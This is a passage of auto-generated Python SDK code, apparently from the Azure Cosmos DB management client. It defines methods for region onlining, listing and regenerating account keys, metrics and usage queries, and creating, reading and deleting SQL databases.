:param account_name: Cosmos DB database account name.
:type account_name: str
:param region: Cosmos DB region, with spaces between words and each
word capitalized.
:type region: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises:
:class:`ErrorResponseException<azure.mgmt.cosmosdb.models.ErrorResponseException>`
"""
raw_result = self._online_region_initial(
resource_group_name=resource_group_name,
account_name=account_name,
region=region,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
online_region.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/onlineRegion'}
def get_read_only_keys(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the read-only access keys for the specified Azure Cosmos DB
database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DatabaseAccountListReadOnlyKeysResult or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.cosmosdb.models.DatabaseAccountListReadOnlyKeysResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_read_only_keys.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccountListReadOnlyKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_read_only_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/readonlykeys'}
def list_read_only_keys(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the read-only access keys for the specified Azure Cosmos DB
database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: DatabaseAccountListReadOnlyKeysResult or ClientRawResponse if
raw=true
:rtype:
~azure.mgmt.cosmosdb.models.DatabaseAccountListReadOnlyKeysResult or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.list_read_only_keys.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('DatabaseAccountListReadOnlyKeysResult', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
list_read_only_keys.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/readonlykeys'}
def _regenerate_key_initial(
self, resource_group_name, account_name, key_kind, custom_headers=None, raw=False, **operation_config):
key_to_regenerate = models.DatabaseAccountRegenerateKeyParameters(key_kind=key_kind)
# Construct URL
url = self.regenerate_key.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(key_to_regenerate, 'DatabaseAccountRegenerateKeyParameters')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def regenerate_key(
self, resource_group_name, account_name, key_kind, custom_headers=None, raw=False, polling=True, **operation_config):
"""Regenerates an access key for the specified Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param key_kind: The access key to regenerate. Possible values
include: 'primary', 'secondary', 'primaryReadonly',
'secondaryReadonly'
:type key_kind: str or ~azure.mgmt.cosmosdb.models.KeyKind
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._regenerate_key_initial(
resource_group_name=resource_group_name,
account_name=account_name,
key_kind=key_kind,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
regenerate_key.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/regenerateKey'}
def check_name_exists(
self, account_name, custom_headers=None, raw=False, **operation_config):
"""Checks that the Azure Cosmos DB account name already exists. A valid
account name may contain only lowercase letters, numbers, and the '-'
character, and must be between 3 and 50 characters.
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: bool or ClientRawResponse if raw=true
:rtype: bool or ~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.check_name_exists.metadata['url']
path_format_arguments = {
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.head(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 404]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = (response.status_code == 200)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
check_name_exists.metadata = {'url': '/providers/Microsoft.DocumentDB/databaseAccountNames/{accountName}'}
def list_metrics(
self, resource_group_name, account_name, filter, custom_headers=None, raw=False, **operation_config):
"""Retrieves the metrics determined by the given filter for the given
database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param filter: An OData filter expression that describes a subset of
metrics to return. The parameters that can be filtered are name.value
(name of the metric, can have an or of multiple names), startTime,
endTime, and timeGrain. The supported operator is eq.
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Metric
:rtype:
~azure.mgmt.cosmosdb.models.MetricPaged[~azure.mgmt.cosmosdb.models.Metric]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_metrics.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.MetricPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_metrics.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/metrics'}
def list_usages(
self, resource_group_name, account_name, filter=None, custom_headers=None, raw=False, **operation_config):
"""Retrieves the usages (most recent data) for the given database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param filter: An OData filter expression that describes a subset of
usages to return. The supported parameter is name.value (name of the
metric, can have an or of multiple names).
:type filter: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of Usage
:rtype:
~azure.mgmt.cosmosdb.models.UsagePaged[~azure.mgmt.cosmosdb.models.Usage]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_usages.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.UsagePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_usages.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/usages'}
def list_metric_definitions(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Retrieves metric definitions for the given database account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of MetricDefinition
:rtype:
~azure.mgmt.cosmosdb.models.MetricDefinitionPaged[~azure.mgmt.cosmosdb.models.MetricDefinition]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_metric_definitions.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.MetricDefinitionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_metric_definitions.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/metricDefinitions'}
def list_sql_databases(
self, resource_group_name, account_name, custom_headers=None, raw=False, **operation_config):
"""Lists the SQL databases under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of SqlDatabase
:rtype:
~azure.mgmt.cosmosdb.models.SqlDatabasePaged[~azure.mgmt.cosmosdb.models.SqlDatabase]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_sql_databases.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.SqlDatabasePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_sql_databases.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases'}
def get_sql_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the SQL database under an existing Azure Cosmos DB database
account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SqlDatabase or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.SqlDatabase or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SqlDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_sql_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}'}
def _create_update_sql_database_initial(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_sql_database_parameters = models.SqlDatabaseCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_sql_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_sql_database_parameters, 'SqlDatabaseCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SqlDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create_update_sql_database(
self, resource_group_name, account_name, database_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
"""Create or update an Azure Cosmos DB SQL database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a SQL database
:type resource: ~azure.mgmt.cosmosdb.models.SqlDatabaseResource
:param options: A key-value pair of options to be applied for the
request. This corresponds to the headers sent with the request.
:type options: dict[str, str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns SqlDatabase or
ClientRawResponse<SqlDatabase> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.SqlDatabase]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.SqlDatabase]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_sql_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('SqlDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_sql_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}'}
def _delete_sql_database_initial(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_sql_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_sql_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB SQL database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_sql_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_sql_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/sql/databases/{databaseName}'}
def get_sql_database_throughput(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the SQL database under an existing Azure
Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_sql_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
